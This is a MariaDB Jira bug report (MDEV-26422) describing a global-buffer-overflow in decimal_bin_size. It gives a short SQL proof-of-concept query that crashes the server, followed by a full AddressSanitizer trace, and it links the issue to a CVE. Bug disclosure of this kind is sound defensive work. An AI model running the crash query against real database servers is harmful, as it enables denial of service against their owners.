[MDEV-26422] ASAN: global-buffer-overflow in decimal_bin_size on SELECT - Jira

XML

Word

Printable

Details

Type: Bug
Status: Closed (View Workflow)
Priority: Major
Resolution: Duplicate
Affects Version/s: 10.3(EOL), 10.4(EOL), 10.5, 10.6, 10.7(EOL)
Fix Version/s: N/A
Component/s: N/A
Labels:
None
Environment:
Linux version 5.13.0-1-MANJARO (builduser@LEGION) (gcc (GCC) 11.1.0, GNU ld (GNU Binutils) 2.36.1) #1 SMP PREEMPT Mon Jun 7 06:16:10 UTC 2021 x86_64

Description

PoC:

CREATE TABLE v0 AS SELECT NULL AS v1 FROM DUAL ;

 SELECT 'x' FROM v0 GROUP BY v1 , v1 ORDER BY AVG ( from_unixtime ( '' ) ) ;

ASAN report:

ersion: '10.7.0-MariaDB'  socket: '/tmp/0.socket'  port: 10000  Source distribution

=================================================================

==2869677==ERROR: AddressSanitizer: global-buffer-overflow on address 0x55fa8a50bf90 at pc 0x55fa89dcf30d bp 0x7fb3016d0290 sp 0x7fb3016d0280

READ of size 4 at 0x55fa8a50bf90 thread T13

    #0 0x55fa89dcf30c in decimal_bin_size /experiment/mariadb-server/strings/decimal.c:1551

    #1 0x55fa88cd14d2 in my_decimal_get_binary_size(unsigned short, unsigned short) /experiment/mariadb-server/sql/my_decimal.h:346

    #2 0x55fa88cd14d2 in Type_handler_decimal_result::sort_length(THD*, Type_std_attributes const*, SORT_FIELD_ATTR*) const /experiment/mariadb-server/sql/filesort.cc:2182

    #3 0x55fa88cd9bbd in sortlength /experiment/mariadb-server/sql/filesort.cc:2258

    #4 0x55fa88cd9bbd in filesort(THD*, TABLE*, Filesort*, Filesort_tracker*, JOIN*, unsigned long long) /experiment/mariadb-server/sql/filesort.cc:251

    #5 0x55fa886c0698 in create_sort_index(THD*, JOIN*, st_join_table*, Filesort*) /experiment/mariadb-server/sql/sql_select.cc:24386

    #6 0x55fa886c10fe in st_join_table::sort_table() /experiment/mariadb-server/sql/sql_select.cc:22060

    #7 0x55fa886c1373 in join_init_read_record(st_join_table*) /experiment/mariadb-server/sql/sql_select.cc:21999

    #8 0x55fa886f3cce in AGGR_OP::end_send() /experiment/mariadb-server/sql/sql_select.cc:29470

    #9 0x55fa886f45cf in sub_select_postjoin_aggr(JOIN*, st_join_table*, bool) /experiment/mariadb-server/sql/sql_select.cc:20765

    #10 0x55fa8871882b in do_select /experiment/mariadb-server/sql/sql_select.cc:20604

    #11 0x55fa8871882b in JOIN::exec_inner() /experiment/mariadb-server/sql/sql_select.cc:4735

    #12 0x55fa8871a592 in JOIN::exec() /experiment/mariadb-server/sql/sql_select.cc:4513

    #13 0x55fa88712b5a in mysql_select(THD*, TABLE_LIST*, List<Item>&, Item*, unsigned int, st_order*, st_order*, Item*, st_order*, unsigned long long, select_result*, st_select_lex_unit*, st_select_lex*) /experiment/mariadb-server/sql/sql_select.cc:4991

    #14 0x55fa88714654 in handle_select(THD*, LEX*, select_result*, unsigned long) /experiment/mariadb-server/sql/sql_select.cc:545

    #15 0x55fa88557d7c in execute_sqlcom_select /experiment/mariadb-server/sql/sql_parse.cc:6256

    #16 0x55fa88581420 in mysql_execute_command(THD*, bool) /experiment/mariadb-server/sql/sql_parse.cc:3946

    #17 0x55fa885865a0 in mysql_parse(THD*, char*, unsigned int, Parser_state*) /experiment/mariadb-server/sql/sql_parse.cc:8030

    #18 0x55fa8858c60b in dispatch_command(enum_server_command, THD*, char*, unsigned int, bool) /experiment/mariadb-server/sql/sql_parse.cc:1896

    #19 0x55fa8859173c in do_command(THD*, bool) /experiment/mariadb-server/sql/sql_parse.cc:1404

    #20 0x55fa8894ce56 in do_handle_one_connection(CONNECT*, bool) /experiment/mariadb-server/sql/sql_connect.cc:1418

    #21 0x55fa8894d33c in handle_one_connection /experiment/mariadb-server/sql/sql_connect.cc:1312

    #22 0x55fa893ddc2b in pfs_spawn_thread /experiment/mariadb-server/storage/perfschema/pfs.cc:2201

    #23 0x7fb32095f258 in start_thread (/usr/lib/libpthread.so.0+0x9258)

    #24 0x7fb32050a5e2 in __GI___clone (/usr/lib/libc.so.6+0xfe5e2)

0x55fa8a50bf90 is located 16 bytes to the left of global variable 'dig2bytes' defined in '/experiment/mariadb-server/strings/decimal.c:132:18' (0x55fa8a50bfa0) of size 40

0x55fa8a50bf90 is located 16 bytes to the right of global variable 'frac_max' defined in '/experiment/mariadb-server/strings/decimal.c:133:19' (0x55fa8a50bf60) of size 32

SUMMARY: AddressSanitizer: global-buffer-overflow /experiment/mariadb-server/strings/decimal.c:1551 in decimal_bin_size

Shadow bytes around the buggy address:

  0x0abfd14997a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0abfd14997b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0abfd14997c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0abfd14997d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0abfd14997e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

=>0x0abfd14997f0: f9 f9[f9]f9 00 00 00 00 00 f9 f9 f9 f9 f9 f9 f9

  0x0abfd1499800: 00 00 00 00 00 f9 f9 f9 f9 f9 f9 f9 00 00 00 00

  0x0abfd1499810: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0abfd1499820: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0abfd1499830: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0abfd1499840: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Shadow byte legend (one shadow byte represents 8 application bytes):

  Addressable:           00

  Partially addressable: 01 02 03 04 05 06 07

  Heap left redzone:       fa

  Freed heap region:       fd

  Stack left redzone:      f1

  Stack mid redzone:       f2

  Stack right redzone:     f3

  Stack after return:      f5

  Stack use after scope:   f8

  Global redzone:          f9

  Global init order:       f6

  Poisoned by user:        f7

  Container overflow:      fc

  Array cookie:            ac

  Intra object redzone:    bb

  ASan internal:           fe

  Left alloca redzone:     ca

  Right alloca redzone:    cb

  Shadow gap:              cc

Thread T13 created by T0 here:

    #0 0x7fb320f92fa7 in __interceptor_pthread_create /build/gcc/src/gcc/libsanitizer/asan/asan_interceptors.cpp:216

    #1 0x55fa893ddea9 in my_thread_create /experiment/mariadb-server/storage/perfschema/my_thread.h:48

    #2 0x55fa893ddea9 in pfs_spawn_thread_v1 /experiment/mariadb-server/storage/perfschema/pfs.cc:2252

    #3 0x55fa8824eb3c in inline_mysql_thread_create /experiment/mariadb-server/include/mysql/psi/mysql_thread.h:1139

    #4 0x55fa8824eb3c in create_thread_to_handle_connection(CONNECT*) /experiment/mariadb-server/sql/mysqld.cc:5934

    #5 0x55fa8825a7b6 in handle_accepted_socket(st_mysql_socket, st_mysql_socket) /experiment/mariadb-server/sql/mysqld.cc:6055

    #6 0x55fa8825b36f in handle_connections_sockets() /experiment/mariadb-server/sql/mysqld.cc:6179

    #7 0x55fa8825ea52 in mysqld_main(int, char**) /experiment/mariadb-server/sql/mysqld.cc:5829

    #8 0x7fb320433b24 in __libc_start_main (/usr/lib/libc.so.6+0x27b24)

==2869677==ABORTING

Attachments

Issue Links

duplicates

MDEV-25317 Assertion `scale <= precision' failed in decimal_bin_size And Assertion `scale >= 0 && precision > 0 && scale <= precision' failed in decimal_bin_size_inline/decimal_bin_size

Closed

links to

CVE-2022-27387

Activity

People

Assignee:: Unassigned

Reporter:: yaoguang

Votes:: 0 Vote for this issue

Watchers:: 4 Start watching this issue

Dates

Created:: 2021-08-19 03:12

Updated:: 2022-04-13 13:04

Resolved:: 2021-08-27 08:23

Git Integration

Error rendering 'com.xiplink.jira.git.jira_git_plugin:git-issue-webpanel'. Please contact your Jira administrators.